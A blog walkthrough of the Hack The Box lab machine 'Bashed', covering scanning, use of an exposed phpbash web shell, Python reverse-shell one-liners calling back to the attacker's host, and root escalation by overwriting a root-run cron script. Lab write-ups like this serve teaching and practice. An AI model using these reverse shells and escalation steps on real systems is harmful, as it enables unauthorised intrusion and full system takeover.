Bashed Write-Up

Enumeration

NMAP

Using the lazy script *-A* (for all scripts) we discover an open port at 80, running Apache 2.4.18 (UBUNTU).

# nmap -A 10.10.10.68                        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...[snipped]
Let’s see what’s this website is about.

Dirbuster report

Of course, running a directory bruteforce is the next logical thing to do. It reveals bunch of directories and files that are interesting:

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php

The developer boasted about a phpbash file which he created onto the platform. Let’s see how we can use it to our advantage.

Burp Suite

I am going to try and see the contents of the file of interest.

Request

The file runs bash commands on the local host. Let’s cat our first flag 🙂

POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;

Response

HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f31<redacted>

Let’s see how we can escalate our privileges and gain root.

Firstly, let’s get reverse shell:

  1. change attacking IP:PORT
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Result:

Let’s upgrade our shell, so that we could make it more usable:

  1. Spawn better shell: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
  2. Get access to term commands: export TERM=xterm
  3. Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg

Privelege Escalation

  • Ran linenum.sh locally but nothing really was of interest.
  • Looked for SGID/SUID files.
  • finally looked into sudoers and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

It seems we (www-data) could run commands as user scriptmanager since it does not require password.

$ sudo -u scriptmanager whoami
scriptmanager

To become user scriptmanager we type in:

sudo -u scriptmanager /bin/bash -i 

Let’s enumerate further. What does this user owns or has access to?

[email protected]:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout

It appears it owns something within /scripts/test.py

[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

[email protected]:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19 test.py
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt

So, if it is executed by cron, test.py runs as root since it opens test.txt? Or, perhaps the scheduler runs everything as root in the folder. Let’s add sauce: python reverse shell

[email protected]:/scripts$ cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",5555)) //change this
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Results in reverse shell

# nc -lnvp 5555
listening on \[any\] 1337 ...  
connect to \[10.10.14.6\] from (UNKNOWN) \[10.10.10.68\] 50176  
/bin/sh: 0: can’t access tty; job control turned off  
# whoami  
root  
# cat /root/root.txt  

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: